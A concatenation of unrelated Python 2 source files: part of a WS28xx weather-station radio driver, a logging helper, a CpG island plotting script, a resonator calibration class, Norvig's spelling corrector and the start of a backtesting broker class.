               ' this=%d (0x%04x) latest=%d (0x%04x) nrec=%d' %
               (data.Time, thisIndex, thisAddr, latestIndex, latestAddr, nrec))

        # track the latest history index
        self.DataStore.setLastHistoryIndex(thisIndex)
        self.DataStore.setLatestHistoryIndex(latestIndex)

        nextIndex = None
        if self.command == EAction.aGetHistory:
            if self.history_cache.start_index is None:
                nreq = 0
                if self.history_cache.num_rec > 0:
                    loginf('handleHistoryData: request for %s records' %
                           self.history_cache.num_rec)
                    nreq = self.history_cache.num_rec
                else:
                    loginf('handleHistoryData: request records since %s' %
                           weeutil.weeutil.timestamp_to_string(self.history_cache.since_ts))
                    span = int(time.time()) - self.history_cache.since_ts
                    # FIXME: what if we do not have config data yet?
                    cfg = self.getConfigData().asDict()
                    arcint = 60 * getHistoryInterval(cfg['history_interval'])
                    # FIXME: this assumes a constant archive interval for all
                    # records in the station history
                    nreq = int(span / arcint) + 5 # FIXME: punt 5
                if nreq > nrec:
                    loginf('handleHistoryData: too many records requested (%d)'
                           ', clipping to number stored (%d)' % (nreq, nrec))
                    nreq = nrec
                idx = get_index(latestIndex - nreq)
                self.history_cache.start_index = idx
                self.history_cache.next_index = idx
                self.DataStore.setLastHistoryIndex(idx)
                self.history_cache.num_outstanding_records = nreq
                logdbg('handleHistoryData: start_index=%s'
                       ' num_outstanding_records=%s' % (idx, nreq))
                nextIndex = idx
            elif self.history_cache.next_index is not None:
                # thisIndex should be the next record after next_index
                thisIndexTst = get_next_index(self.history_cache.next_index)
                if thisIndexTst == thisIndex:
                    self.history_cache.num_scanned += 1
                    # get the next history record
                    if ts is not None and self.history_cache.since_ts <= ts:
                        # Check if two records in a row with the same ts
                        if self.history_cache.last_ts == ts:
                            logdbg('handleHistoryData: remove previous record'
                                   ' with duplicate timestamp: %s' %
                                   weeutil.weeutil.timestamp_to_string(ts))
                            self.history_cache.records.pop()
                        self.history_cache.last_ts = ts
                        # append to the history
                        logdbg('handleHistoryData: appending history record'
                               ' %s: %s' % (thisIndex, data.asDict()))
                        self.history_cache.records.append(data.asDict())
                        self.history_cache.num_outstanding_records = nrec
                    elif ts is None:
                        logerr('handleHistoryData: skip record: this_ts=None')
                    else:
                        logdbg('handleHistoryData: skip record: since_ts=%s this_ts=%s' % (weeutil.weeutil.timestamp_to_string(self.history_cache.since_ts), weeutil.weeutil.timestamp_to_string(ts)))
                    self.history_cache.next_index = thisIndex
                else:
                    loginf('handleHistoryData: index mismatch: %s != %s' %
                           (thisIndexTst, thisIndex))
                nextIndex = self.history_cache.next_index

        logdbg('handleHistoryData: next=%s' % nextIndex)
        self.setSleep(0.300,0.010)
        newlen[0] = self.buildACKFrame(newbuf, EAction.aGetHistory, cs, nextIndex)

        buflen[0] = newlen[0]
        buf[0] = newbuf[0]

    def handleNextAction(self,Buffer,Length):
        newBuffer = [0]
        newBuffer[0] = Buffer[0]
        newLength = [0]
        newLength[0] = Length[0]
        self.DataStore.setLastStatCache(seen_ts=int(time.time()),
                                        quality=(Buffer[0][3] & 0x7f))
        cs = newBuffer[0][5] | (newBuffer[0][4] << 8)
        if (Buffer[0][2] & 0xEF) == EResponseType.rtReqFirstConfig:
            logdbg('handleNextAction: a1 (first-time config)')
            self.setSleep(0.085,0.005)
            newLength[0] = self.buildFirstConfigFrame(newBuffer, cs)
        elif (Buffer[0][2] & 0xEF) == EResponseType.rtReqSetConfig:
            logdbg('handleNextAction: a2 (set config data)')
            self.setSleep(0.085,0.005)
            newLength[0] = self.buildConfigFrame(newBuffer)
        elif (Buffer[0][2] & 0xEF) == EResponseType.rtReqSetTime:
            logdbg('handleNextAction: a3 (set time data)')
            now = int(time.time())
            age = now - self.DataStore.LastStat.last_weather_ts
            if age >= (self.DataStore.getCommModeInterval() +1) * 2:
                # always set time if init or stale communication
                self.setSleep(0.085,0.005)
                newLength[0] = self.buildTimeFrame(newBuffer, cs)
            else:
                # When time is set at the whole hour we may get an extra
                # historical record with time stamp a history period ahead
                # We will skip settime if offset to whole hour is too small
                # (time difference between WS and server < self._a3_offset)
                m, s = divmod(now, 60)
                h, m = divmod(m, 60)
                logdbg('Time: hh:%02d:%02d' % (m,s))
                if (m == 59 and s >= (60 - self._a3_offset)) or (m == 0 and s <= self._a3_offset):
                    logdbg('Skip settime; time difference <= %s s' % int(self._a3_offset))
                    self.setSleep(0.300,0.010)
                    newLength[0] = self.buildACKFrame(newBuffer, EAction.aGetHistory, cs)
                else:
                    # set time
                    self.setSleep(0.085,0.005)
                    newLength[0] = self.buildTimeFrame(newBuffer, cs)
        else:
            logdbg('handleNextAction: %02x' % (Buffer[0][2] & 0xEF))
            self.setSleep(0.300,0.010)
            newLength[0] = self.buildACKFrame(newBuffer, EAction.aGetHistory, cs)

        Length[0] = newLength[0]
        Buffer[0] = newBuffer[0]

    def generateResponse(self, Buffer, Length):
        if DEBUG_COMM > 1:
            logdbg('generateResponse: %s' % self.timing())
        newBuffer = [0]
        newBuffer[0] = Buffer[0]
        newLength = [0]
        newLength[0] = Length[0]
        if Length[0] == 0:
            raise BadResponse('zero length buffer')

        bufferID = (Buffer[0][0] <<8) | Buffer[0][1]
        respType = (Buffer[0][2] & 0xE0)
        if DEBUG_COMM > 1:
            logdbg("generateResponse: id=%04x resp=%x length=%x" %
                   (bufferID, respType, Length[0]))
        deviceID = self.DataStore.getDeviceID()
        if bufferID != 0xF0F0:
            self.DataStore.setRegisteredDeviceID(bufferID)

        if bufferID == 0xF0F0:
            loginf('generateResponse: console not paired, attempting to pair to 0x%04x' % deviceID)
            newLength[0] = self.buildACKFrame(newBuffer, EAction.aGetConfig, deviceID, 0xFFFF)
        elif bufferID == deviceID:
            if respType == EResponseType.rtDataWritten:
                #    00000000: 00 00 06 00 32 20
                if Length[0] == 0x06:
                    self.DataStore.StationConfig.setResetMinMaxFlags(0)
                    self.shid.setRX()
                    raise DataWritten()
                else:
                    raise BadResponse('len=%x resp=%x' % (Length[0], respType))
            elif respType == EResponseType.rtGetConfig:
                #    00000000: 00 00 30 00 32 40
                if Length[0] == 0x30:
                    self.handleConfig(newBuffer, newLength)
                else:
                    raise BadResponse('len=%x resp=%x' % (Length[0], respType))
            elif respType == EResponseType.rtGetCurrentWeather:
                #    00000000: 00 00 d7 00 32 60
                if Length[0] == 0xd7: #215
                    self.handleCurrentData(newBuffer, newLength)
                else:
                    raise BadResponse('len=%x resp=%x' % (Length[0], respType))
            elif respType == EResponseType.rtGetHistory:
                #    00000000: 00 00 1e 00 32 80
                if Length[0] == 0x1e:
                    self.handleHistoryData(newBuffer, newLength)
                else:
                    raise BadResponse('len=%x resp=%x' % (Length[0], respType))
            elif respType == EResponseType.rtRequest:
                #    00000000: 00 00 06 f0 f0 a1
                #    00000000: 00 00 06 00 32 a3
                #    00000000: 00 00 06 00 32 a2
                if Length[0] == 0x06:
                    self.handleNextAction(newBuffer, newLength)
                else:
                    raise BadResponse('len=%x resp=%x' % (Length[0], respType))
            else:
                raise BadResponse('unexpected response type %x' % respType)
        elif respType not in [0x20,0x40,0x60,0x80,0xa1,0xa2,0xa3]:
            # message is probably corrupt
            raise BadResponse('unknown response type %x' % respType)
        else:
            msg = 'message from console contains unknown device ID (id=%04x resp=%x)' % (bufferID, respType)
            logdbg(msg)
            log_frame(Length[0],Buffer[0])
            raise BadResponse(msg)

        Buffer[0] = newBuffer[0]
        Length[0] = newLength[0]

    def configureRegisterNames(self):
        self.reg_names[self.AX5051RegisterNames.IFMODE]    =0x00
        self.reg_names[self.AX5051RegisterNames.MODULATION]=0x41 #fsk
        self.reg_names[self.AX5051RegisterNames.ENCODING]  =0x07
        self.reg_names[self.AX5051RegisterNames.FRAMING]   =0x84 #1000:0100 ##?hdlc? |1000 010 0
        self.reg_names[self.AX5051RegisterNames.CRCINIT3]  =0xff
        self.reg_names[self.AX5051RegisterNames.CRCINIT2]  =0xff
        self.reg_names[self.AX5051RegisterNames.CRCINIT1]  =0xff
        self.reg_names[self.AX5051RegisterNames.CRCINIT0]  =0xff
        self.reg_names[self.AX5051RegisterNames.FREQ3]     =0x38
        self.reg_names[self.AX5051RegisterNames.FREQ2]     =0x90
        self.reg_names[self.AX5051RegisterNames.FREQ1]     =0x00
        self.reg_names[self.AX5051RegisterNames.FREQ0]     =0x01
        self.reg_names[self.AX5051RegisterNames.PLLLOOP]   =0x1d
        self.reg_names[self.AX5051RegisterNames.PLLRANGING]=0x08
        self.reg_names[self.AX5051RegisterNames.PLLRNGCLK] =0x03
        self.reg_names[self.AX5051RegisterNames.MODMISC]   =0x03
        self.reg_names[self.AX5051RegisterNames.SPAREOUT]  =0x00
        self.reg_names[self.AX5051RegisterNames.TESTOBS]   =0x00
        self.reg_names[self.AX5051RegisterNames.APEOVER]   =0x00
        self.reg_names[self.AX5051RegisterNames.TMMUX]     =0x00
        self.reg_names[self.AX5051RegisterNames.PLLVCOI]   =0x01
        self.reg_names[self.AX5051RegisterNames.PLLCPEN]   =0x01
        self.reg_names[self.AX5051RegisterNames.RFMISC]    =0xb0
        self.reg_names[self.AX5051RegisterNames.REF]       =0x23
        self.reg_names[self.AX5051RegisterNames.IFFREQHI]  =0x20
        self.reg_names[self.AX5051RegisterNames.IFFREQLO]  =0x00
        self.reg_names[self.AX5051RegisterNames.ADCMISC]   =0x01
        self.reg_names[self.AX5051RegisterNames.AGCTARGET] =0x0e
        self.reg_names[self.AX5051RegisterNames.AGCATTACK] =0x11
        self.reg_names[self.AX5051RegisterNames.AGCDECAY]  =0x0e
        self.reg_names[self.AX5051RegisterNames.CICDEC]    =0x3f
        self.reg_names[self.AX5051RegisterNames.DATARATEHI]=0x19
        self.reg_names[self.AX5051RegisterNames.DATARATELO]=0x66
        self.reg_names[self.AX5051RegisterNames.TMGGAINHI] =0x01
        self.reg_names[self.AX5051RegisterNames.TMGGAINLO] =0x96
        self.reg_names[self.AX5051RegisterNames.PHASEGAIN] =0x03
        self.reg_names[self.AX5051RegisterNames.FREQGAIN]  =0x04
        self.reg_names[self.AX5051RegisterNames.FREQGAIN2] =0x0a
        self.reg_names[self.AX5051RegisterNames.AMPLGAIN]  =0x06
        self.reg_names[self.AX5051RegisterNames.AGCMANUAL] =0x00
        self.reg_names[self.AX5051RegisterNames.ADCDCLEVEL]=0x10
        self.reg_names[self.AX5051RegisterNames.RXMISC]    =0x35
        self.reg_names[self.AX5051RegisterNames.FSKDEV2]   =0x00
        self.reg_names[self.AX5051RegisterNames.FSKDEV1]   =0x31
        self.reg_names[self.AX5051RegisterNames.FSKDEV0]   =0x27
        self.reg_names[self.AX5051RegisterNames.TXPWR]     =0x03
        self.reg_names[self.AX5051RegisterNames.TXRATEHI]  =0x00
        self.reg_names[self.AX5051RegisterNames.TXRATEMID] =0x51
        self.reg_names[self.AX5051RegisterNames.TXRATELO]  =0xec
        self.reg_names[self.AX5051RegisterNames.TXDRIVER]  =0x88

    def initTransceiver(self, frequency_standard):
        logdbg('initTransceiver: frequency_standard=%s' % frequency_standard)

        self.DataStore.setFrequencyStandard(frequency_standard)
        self.configureRegisterNames()

        # calculate the frequency then set frequency registers
        freq = self.DataStore.TransceiverSettings.Frequency
        loginf('base frequency: %d' % freq)
        freqVal =  long(freq / 16000000.0 * 16777216.0)
        corVec = [None]
        self.shid.readConfigFlash(0x1F5, 4, corVec)
        corVal = corVec[0][0] << 8
        corVal |= corVec[0][1]
        corVal <<= 8
        corVal |= corVec[0][2]
        corVal <<= 8
        corVal |= corVec[0][3]
        loginf('frequency correction: %d (0x%x)' % (corVal,corVal))
        freqVal += corVal
        if not (freqVal % 2):
            freqVal += 1
        loginf('adjusted frequency: %d (0x%x)' % (freqVal,freqVal))
        self.reg_names[self.AX5051RegisterNames.FREQ3] = (freqVal >>24) & 0xFF
        self.reg_names[self.AX5051RegisterNames.FREQ2] = (freqVal >>16) & 0xFF
        self.reg_names[self.AX5051RegisterNames.FREQ1] = (freqVal >>8)  & 0xFF
        self.reg_names[self.AX5051RegisterNames.FREQ0] = (freqVal >>0)  & 0xFF
        logdbg('frequency registers: %x %x %x %x' % (
                self.reg_names[self.AX5051RegisterNames.FREQ3],
                self.reg_names[self.AX5051RegisterNames.FREQ2],
                self.reg_names[self.AX5051RegisterNames.FREQ1],
                self.reg_names[self.AX5051RegisterNames.FREQ0]))

        # figure out the transceiver id
        buf = [None]
        self.shid.readConfigFlash(0x1F9, 7, buf)
        tid  = buf[0][5] << 8
        tid += buf[0][6]
        loginf('transceiver identifier: %d (0x%04x)' % (tid,tid))
        self.DataStore.setDeviceID(tid)

        # figure out the transceiver serial number
        sn  = str("%02d"%(buf[0][0]))
        sn += str("%02d"%(buf[0][1]))
        sn += str("%02d"%(buf[0][2]))
        sn += str("%02d"%(buf[0][3]))
        sn += str("%02d"%(buf[0][4]))
        sn += str("%02d"%(buf[0][5]))
        sn += str("%02d"%(buf[0][6]))
        loginf('transceiver serial: %s' % sn)
        self.DataStore.setTransceiverSerNo(sn)
            
        for r in self.reg_names:
            self.shid.writeReg(r, self.reg_names[r])

    def setup(self, frequency_standard,
              vendor_id, product_id, device_id, serial,
              comm_interval=3):
        self.DataStore.setCommModeInterval(comm_interval)
        self.shid.open(vendor_id, product_id, device_id, serial)
        self.initTransceiver(frequency_standard)
        self.DataStore.setTransceiverPresent(True)

    def teardown(self):
        self.shid.close()

    # FIXME: make this thread-safe
    def getWeatherData(self):
        return self.DataStore.CurrentWeather

    # FIXME: make this thread-safe
    def getLastStat(self):
        return self.DataStore.LastStat

    # FIXME: make this thread-safe
    def getConfigData(self):
        return self.DataStore.StationConfig

    def startCachingHistory(self, since_ts=0, num_rec=0):
        self.history_cache.clear_records()
        if since_ts is None:
            since_ts = 0
        self.history_cache.since_ts = since_ts
        if num_rec > WS28xxDriver.max_records - 2:
            num_rec = WS28xxDriver.max_records - 2
        self.history_cache.num_rec = num_rec
        self.command = EAction.aGetHistory

    def stopCachingHistory(self):
        self.command = None

    def getUncachedHistoryCount(self):
        return self.history_cache.num_outstanding_records

    def getNextHistoryIndex(self):
        return self.history_cache.next_index

    def getNumHistoryScanned(self):
        return self.history_cache.num_scanned

    def getLatestHistoryIndex(self):
        return self.DataStore.LastStat.LatestHistoryIndex

    def getHistoryCacheRecords(self):
        return self.history_cache.records

    def clearHistoryCache(self):
        self.history_cache.clear_records()

    def startRFThread(self):
        if self.child is not None:
            return
        logdbg('startRFThread: spawning RF thread')
        self.running = True
        self.child = threading.Thread(target=self.doRF)
        self.child.setName('RFComm')
        self.child.setDaemon(True)
        self.child.start()

    def stopRFThread(self):
        self.running = False
        logdbg('stopRFThread: waiting for RF thread to terminate')
        self.child.join(self.thread_wait)
        if self.child.isAlive():
            logerr('unable to terminate RF thread after %d seconds' %
                   self.thread_wait)
        else:
            self.child = None

    def isRunning(self):
        return self.running

    def doRF(self):
        try:
            logdbg('setting up rf communication')
            self.doRFSetup()
            logdbg('starting rf communication')
            while self.running:
                self.doRFCommunication()
        except Exception, e:
            logerr('exception in doRF: %s' % e)
            if weewx.debug:
                log_traceback(dst=syslog.LOG_DEBUG)
            self.running = False
            raise
        finally:
            logdbg('stopping rf communication')

    # it is probably not necessary to have two setPreamblePattern invocations.
    # however, HeavyWeatherPro seems to do it this way on a first time config.
    # doing it this way makes configuration easier during a factory reset and
    # when re-establishing communication with the station sensors.
    def doRFSetup(self):
        self.shid.execute(5)
        self.shid.setPreamblePattern(0xaa)
        self.shid.setState(0)
        time.sleep(1)
        self.shid.setRX()

        self.shid.setPreamblePattern(0xaa)
        self.shid.setState(0x1e)
        time.sleep(1)
        self.shid.setRX()
        self.setSleep(0.085,0.005)

    def doRFCommunication(self):
        time.sleep(self.firstSleep)
        self.pollCount = 0
        while self.running:
            StateBuffer = [None]
            self.shid.getState(StateBuffer)
            self.pollCount += 1
            if StateBuffer[0][0] == 0x16:
                break
            time.sleep(self.nextSleep)
        else:
            return

        DataLength = [0]
        DataLength[0] = 0
        FrameBuffer=[0]
        FrameBuffer[0]=[0]*0x03
        self.shid.getFrame(FrameBuffer, DataLength)
        try:
            self.generateResponse(FrameBuffer, DataLength)
            self.shid.setFrame(FrameBuffer[0], DataLength[0])
        except BadResponse, e:
            logerr('generateResponse failed: %s' % e)
        except DataWritten, e:
            logdbg('SetTime/SetConfig data written')
        self.shid.setTX()

    # these are for diagnostics and debugging
    def setSleep(self, firstsleep, nextsleep):
        self.firstSleep = firstsleep
        self.nextSleep = nextsleep

    def timing(self):
        s = self.firstSleep + self.nextSleep * (self.pollCount - 1)
        return 'sleep=%s first=%s next=%s count=%s' % (
            s, self.firstSleep, self.nextSleep, self.pollCount)

#
# logutil.py
# A module containing means of interacting with log files.
#

import logging
import logging.handlers
import os
import time

from data_structures import enum
from config import get_config_value


LoggingSection = enum(
    'CLIENT',
    'CRAWLER',
    'DATA',
    'FRONTIER',
    'TEST',
    'UTILITIES',
)

#region Setup
logging.basicConfig(level=logging.INFO,
                    format='[%(asctime)s %(levelname)s] %(name)s::%(funcName)s - %(message)s',
                    datefmt='%x %X %Z')
module_dir = os.path.dirname(__file__)
logfile = os.path.join(module_dir, get_config_value('LOG', 'path'))
logdir = os.path.join(module_dir, get_config_value('LOG', 'dir'))

if not os.path.exists(logdir):
    os.mkdir(logdir)

handler = logging.handlers.RotatingFileHandler(logfile,
                                               maxBytes=8192,
                                               backupCount=10, )
formatter = logging.Formatter('[%(asctime)s %(levelname)s] %(name)s::%(funcName)s - %(message)s')
formatter.datefmt = '%x %X %Z'
formatter.converter = time.gmtime
handler.setFormatter(formatter)
#endregion


def get_logger(section, name):
    """
    Fetches a logger.

    Arguments:
        section (string): The section the logger is attributed to.
        name (string): The name of the logger.

    Returns:
        The logger corresponding to the section and name provided.
    """
    section_name = LoggingSection.reverse_mapping[section].lower()

    logger = logging.getLogger('htresearch.{0}.{1}'.format(section_name, name))
    logger.addHandler(handler)
    logger.setLevel(logging.INFO)

    return logger
#!/usr/bin/env python

'''
Purpose:
This script, using default values, determines and plots the CpG islands in 
relation to a given feature "type" (e.g. "gene" or "mRNA") from a GFF file 
which corresponds to the user-provided fasta file.

Note:
CpG Islands are determined by ObEx = (Observed CpG) / (Expected CpG) ,
default threshold > 1. 

Where Expected CpG = (count(C) * count(G)) / WindowSize

Usage:
python cpg_gene.py FastaFile Gff_File OutFile.png

Default optional parameters:
    -s, Step Size, default = 50
    -w, Window Size, default = 200
    -oe, Minimum Observed Expected CpG, default = 1
    -gc, Minimum GC, default = .5
    -r Range from ATG, or provided feature, default = 5000
    -f, GFF Feature, default = "gene"
    -i, Gene ID from GFF, default = ""
'''

import sys
import os
import argparse

from collections import Counter
from Bio import SeqIO
import cpgmod
import gffutils

import pandas as pd
import numpy as np
from ggplot import *


# Capture command line args, with or without defaults
if __name__ == '__main__':
    # Parse the arguments
    LineArgs = cpgmod.parseArguments()

# Populate vars with args
FastaFile = LineArgs.FastaFile
GffFile = LineArgs.GffFile
OutFile = LineArgs.FileOut
Step = LineArgs.s
WinSize = LineArgs.w
ObExthresh = LineArgs.oe
GCthresh = LineArgs.gc
StartRange = LineArgs.r
FeatGFF = LineArgs.f
ID_Feat = LineArgs.i

# Gather all possible CpG islands
MergedRecs = []
print "Parsing sequences...\n"
for SeqRecord in SeqIO.parse(FastaFile, "fasta"):
    print SeqRecord.id
    # Determine if sequences and args are acceptable
    cpgmod.arg_seqcheck(SeqRecord, WinSize, Step)
    # Pre-determine number of islands
    NumOfChunks = cpgmod.chunks(SeqRecord, WinSize, Step)
    # Return array of SeqRec class (potential CpG island) instances
    SeqRecList = cpgmod.compute(SeqRecord, Step, NumOfChunks, WinSize)
    MergedRecs = MergedRecs + SeqRecList

# Create GFF DB
GffDb = gffutils.create_db(GffFile, dbfn='GFF.db', force=True, keep_order=True, 
                            merge_strategy='merge', sort_attribute_values=True,
                            disable_infer_transcripts=True,
                            disable_infer_genes=True)

print "\nGFF Database Created...\n"

# Filter out SeqRec below threshold 
DistArr = []
for Rec in MergedRecs:
    Cond1 = Rec.expect() > 0     
    if Cond1 == True:
        ObEx = (Rec.observ() / Rec.expect())
        Cond2 = ObEx > ObExthresh 
        Cond3 = Rec.gc_cont() > GCthresh
        if Cond2 and Cond3:
            # Query GFF DB for closest gene feature *or provided feature*
            Arr = cpgmod.get_closest(Rec, GffDb, StartRange, FeatGFF, ID_Feat)
            if Arr <> False:
                Arr.append(ObEx)
                DistArr.append(Arr)

print "CpG Islands predicted...\n"
print "Generating Figure...\n"

# Releasing SeqRecs
MergedRecs = None
SeqRecList = None

# Pre-check DistArr Results
if len(DistArr) < 2:
    print "WARNING, "+ str(len(DistArr)) + " sites were found."
    print "Consider changing parameters.\n"

# Generate Figure:
ObExRes = pd.DataFrame({
                    'gene' : [],
                    'xval': [],
                    'yval': []})

try:
    Cnt = 0
    for Dist in DistArr:
        Cnt += 1
        print "PROGRESS: "+str(Cnt) +" of "+ str(len(DistArr))
        ObExdf = pd.DataFrame({
                        'gene': [Dist[2]],
                        'xval': [Dist[1]],
                        'yval': [Dist[3]]})
        ObExFram = [ObExRes, ObExdf]
        ObExRes = pd.concat(ObExFram, ignore_index=True)
    p = ggplot(aes(x='xval', y='yval'), data=ObExRes) \
        + geom_point() \
        + ylab("Observed/Expected CpG") \
        + xlab("Position (bp) Relative to (ATG = 0)") \
        + ggtitle("Predicted CpG Island Position Relative to ATG")
    p.save(OutFile)
except IndexError as e:
    print 'Error: '+ str(e)
    sys.exit('Exiting script...')
print p

# Remove GFF DB
os.remove('GFF.db')


import numpy as np
from scipy import sparse
from scipy.interpolate import interp1d

class calibration(object):
	'''
	some useful tools for manual calibration
	'''
	def normalize_zdata(self,z_data,cal_z_data):
		return z_data/cal_z_data
		
	def normalize_amplitude(self,z_data,cal_ampdata):
		return z_data/cal_ampdata
		
	def normalize_phase(self,z_data,cal_phase):
		return z_data*np.exp(-1j*cal_phase)
		
	def normalize_by_func(self,f_data,z_data,func):
		return z_data/func(f_data)
		
	def _baseline_als(self,y, lam, p, niter=10):
		'''
		see http://zanran_storage.s3.amazonaws.com/www.science.uva.nl/ContentPages/443199618.pdf
		"Asymmetric Least Squares Smoothing" by P. Eilers and H. Boelens in 2005.
		http://stackoverflow.com/questions/29156532/python-baseline-correction-library
		"There are two parameters: p for asymmetry and lambda for smoothness. Both have to be
		tuned to the data at hand. We found that generally 0.001<=p<=0.1 is a good choice
		(for a trace with positive peaks) and 10e2<=lambda<=10e9, but exceptions may occur."
		'''
		L = len(y)
		D = sparse.csc_matrix(np.diff(np.eye(L), 2))
		w = np.ones(L)
		for i in range(niter):
			W = sparse.spdiags(w, 0, L, L)
			Z = W + lam * D.dot(D.transpose())
			z = sparse.linalg.spsolve(Z, w*y)
			w = p * (y > z) + (1-p) * (y < z)
		return z
		
	def fit_baseline_amp(self,z_data,lam,p,niter=10):
		'''
		for this to work, you need to analyze a large part of the baseline
		tune lam and p until you get the desired result
		'''
		return self._baseline_als(np.absolute(z_data),lam,p,niter=niter)
	
	def baseline_func_amp(self,z_data,f_data,lam,p,niter=10):
		'''
		for this to work, you need to analyze a large part of the baseline
		tune lam and p until you get the desired result
		returns the baseline as a function
		the points in between the datapoints are computed by cubic interpolation
		'''
		return interp1d(f_data, self._baseline_als(np.absolute(z_data),lam,p,niter=niter), kind='cubic')
		
	def baseline_func_phase(self,z_data,f_data,lam,p,niter=10):
		'''
		for this to work, you need to analyze a large part of the baseline
		tune lam and p until you get the desired result
		returns the baseline as a function
		the points in between the datapoints are computed by cubic interpolation
		'''
		return interp1d(f_data, self._baseline_als(np.angle(z_data),lam,p,niter=niter), kind='cubic')
		
	def fit_baseline_phase(self,z_data,lam,p,niter=10):
		'''
		for this to work, you need to analyze a large part of the baseline
		tune lam and p until you get the desired result
		'''
		return self._baseline_als(np.angle(z_data),lam,p,niter=niter)

	def GUIbaselinefit(self):
		'''
		A GUI to help you fit the baseline
		'''
		self.__lam = 1e6
		self.__p = 0.9
		niter = 10
		self.__baseline = self._baseline_als(np.absolute(self.z_data_raw),self.__lam,self.__p,niter=niter)
		import matplotlib.pyplot as plt
		from matplotlib.widgets import Slider
		fig, (ax0,ax1) = plt.subplots(nrows=2)
		plt.suptitle('Use the sliders to make the green curve match the baseline.')
		plt.subplots_adjust(left=0.25, bottom=0.25)
		l0, = ax0.plot(np.absolute(self.z_data_raw))
		l0b, = ax0.plot(np.absolute(self.__baseline))
		l1, = ax1.plot(np.absolute(self.z_data_raw/self.__baseline))
		ax0.set_ylabel('amp, rawdata vs. baseline')
		ax1.set_ylabel('amp, corrected')
		axcolor = 'lightgoldenrodyellow'
		axSmooth = plt.axes([0.25, 0.1, 0.65, 0.03], axisbg=axcolor)
		axAsym = plt.axes([0.25, 0.15, 0.65, 0.03], axisbg=axcolor)
		axbcorr = plt.axes([0.25, 0.05, 0.65, 0.03], axisbg=axcolor)
		sSmooth = Slider(axSmooth, 'Smoothness', 0.1, 10., valinit=np.log10(self.__lam),valfmt='1E%f')
		sAsym = Slider(axAsym, 'Asymmetry', 1e-4,0.99999, valinit=self.__p,valfmt='%f')
		sbcorr = Slider(axbcorr, 'vertical shift',0.7,1.1,valinit=1.)
		def update(val):
			self.__lam = 10**sSmooth.val
			self.__p = sAsym.val
			self.__baseline = sbcorr.val*self._baseline_als(np.absolute(self.z_data_raw),self.__lam,self.__p,niter=niter)
			l0.set_ydata(np.absolute(self.z_data_raw))
			l0b.set_ydata(np.absolute(self.__baseline))
			l1.set_ydata(np.absolute(self.z_data_raw/self.__baseline))
			fig.canvas.draw_idle()
		sSmooth.on_changed(update)
		sAsym.on_changed(update)
		sbcorr.on_changed(update)
		plt.show()
		self.z_data_raw /= self.__baseline
		plt.close()
		
		
		
		
		
## mostly copied from: http://norvig.com/spell-correct.html

import sys, random
import re, collections, time

TXT_FILE='';
BUF_DIR='';
NWORDS=None;

def words(text): return re.findall('[a-z]+', text) 

def train(features):
    model = collections.defaultdict(lambda: 1)
    for f in features:
        model[f] += 1
    return model

alphabet = 'abcdefghijklmnopqrstuvwxyz'

def edits1(word):
   splits     = [(word[:i], word[i:]) for i in range(len(word) + 1)]
   deletes    = [a + b[1:] for a, b in splits if b]
   transposes = [a + b[1] + b[0] + b[2:] for a, b in splits if len(b)>1]
   replaces   = [a + c + b[1:] for a, b in splits for c in alphabet if b]
   inserts    = [a + c + b     for a, b in splits for c in alphabet]
   return set(deletes + transposes + replaces + inserts)

def known_edits2(word):
    return set(e2 for e1 in edits1(word) for e2 in edits1(e1) if e2 in NWORDS)

def known(words): return set(w for w in words if w in NWORDS)

def correct(word):
    candidates = known([word]) or known(edits1(word)) or known_edits2(word) or [word]
    return max(candidates, key=NWORDS.get)

#######################################################################################
if __name__ == '__main__':
 TXT_FILE = sys.argv[1]

 t0 = time.clock()
 o_words = words(file(TXT_FILE).read())
 NWORDS = train(o_words)
 #print time.clock() - t0, " seconds build time"
 #print "dictionary size: %d" %len(NWORDS)
 et1 = time.clock() - t0

 t_count = 10
 rl = o_words[0:t_count] #random.sample(o_words, t_count)
 orl = [''.join(random.sample(word, len(word))) for word in o_words]
 t1 = time.clock()
 r_count = 10
 for i in range(0, r_count):
  for w1, w2 in zip(rl, orl):
   correct(w1); correct(w2)
 et2 = (time.clock() - t1)/t_count/r_count/2

 print '%d\t%f\t%f' %(len(NWORDS), et1, et2)
#######################################################################################
print 'Done'

#!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
                        unicode_literals)

import collections

import six

from .comminfo import CommissionInfo
from .position import Position
from .metabase import MetaParams
from .order import Order, BuyOrder, SellOrder


class BrokerBack(six.with_metaclass(MetaParams, object)):

    params = (('cash', 10000.0), ('commission', CommissionInfo()),)

    def __init__(self):
        self.comminfo = dict()
        self.init()

    def init(self):
        if None not in self.comminfo.keys():
            self.comminfo = dict({None: self.p.commission})

        self.startingcash = self.cash = self.p.cash

        self.orders = list()  # will only be appending
        self.pending = collections.deque()  # popleft and append(right)

        self.positions = collections.defaultdict(Position)
        self.notifs = collections.deque()

    def getcash(self):
        return self.cash

    def setcash(self, cash):
        self.startingcash = self.cash = self.p.cash = cash

    def getcommissioninfo(self, data):
        if data._name in self.comminfo:
            return self.comminfo[data._name]

        return self.comminfo[None]

    def setcommission(self, commission=0.0, margin=None, mult=1.0, name=None):
        comm = CommissionInfo(commission=commission, margin=margin, mult=mult)
        self.comminfo[name] = comm

    def addcommissioninfo(self, comminfo, name=None):
        self.comminfo[name] = comminfo

    def start(self):
        self.init()

    def stop(self):
        pass

    def cancel(self, order):
        try:
            self.pending.remove(order)
        except ValueError:
            # If the list didn't have the element we didn't cancel anything
            return False

        order.cancel()
        self.notify(order)
        return True

    def getvalue(self, datas=None):
        pos_value = 0.0
        for data in datas or self.positions.keys():
            comminfo = self.getcommissioninfo(data)
            position = self.positions[data]
            pos_value += comminfo.getvalue(position, data.close[0])

        return self.cash + pos_value

    def getposition(self, data):
        return self.positions[data]

    def submit(self, order):
        # FIXME: When an order is submitted, a margin check
        # requirement has to be done before it can be accepted. This implies
        # going over the entire list of pending orders for all datas and
        # existing positions, simulating order execution and ending up
        # with a "cash" figure that can be used to check the margin requirement
        # of the order. If not met, the order can be immediately rejected
        order.pannotated = None
        order.plen = len(order.data)
        order.accept()
